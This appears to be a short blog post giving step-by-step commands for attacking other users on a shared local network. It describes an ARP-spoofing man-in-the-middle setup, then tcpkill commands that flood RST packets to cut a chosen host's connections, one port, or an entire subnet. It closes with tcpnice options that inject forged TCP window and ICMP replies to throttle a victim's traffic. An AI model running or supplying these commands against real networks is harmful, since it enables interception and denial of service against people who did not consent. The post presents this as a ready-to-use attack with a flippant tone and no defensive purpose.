First we need to perform a MITM man in the middle attack(arpspoof or ettercap shall do) and enable forwarding in your kernel as follows:
# echo 1 > /proc/sys/net/ipv4/ip _forward
We then need to determine what local ip is hogging up the bandwidth. There is a useful sniffer that i use call tcptrack that list the live connections that it sees and the bandwidth/speed of the data that is being transfered back and forth on each connection.
#tcptrack -i eth0
Once you determine the IP of the bandwidth hogger (in this example, 10.0.0.2), its time to unleash our magic.
# tcpkill -i eth0 -9 host 10.0.0.2
The '-9' Specifies the degree of brute force to use in killing a connec-tion. Fast connections may require a higher number in order to land a RST in the moving receive window(Thats the method used to kill connections, flood the recieve windows with RST packets to tear down connections). Default is 3.
this in turn would kill/block all of the traffic going to or from 10.0.0.2. If you wanted to be more specific and only block only the port that is using the most bandwidth, you can do this instead.
# tcpkill -i eth0 -9 host 10.0.0.2 and port 4455
Or if you're really mad at the world, you can wipe off the whole subnet.
# tcpkill -9 net 192.168.1
Similarly, tcpnice can be used to slow connections down, rather than to simply kill them.
# tcpnice -i eth0 -A host 10.0.0.2
[Options]
-A Inject TCP tiny window advertisements.
-I Inject ICMP source quench replies.
-M Inject ICMP fragmentation-needed replies with tiny next-hop MTUs.
-i interface to listen on
If no option (A,I,M) is given, all woud be used.
References/Good reading:
http://www.preterhuman.net/texts/underground/hacking/dsniff.txt
http://www.enterprisenetworkingplanet.com/netos/article.php/3564471
No comments:
Post a Comment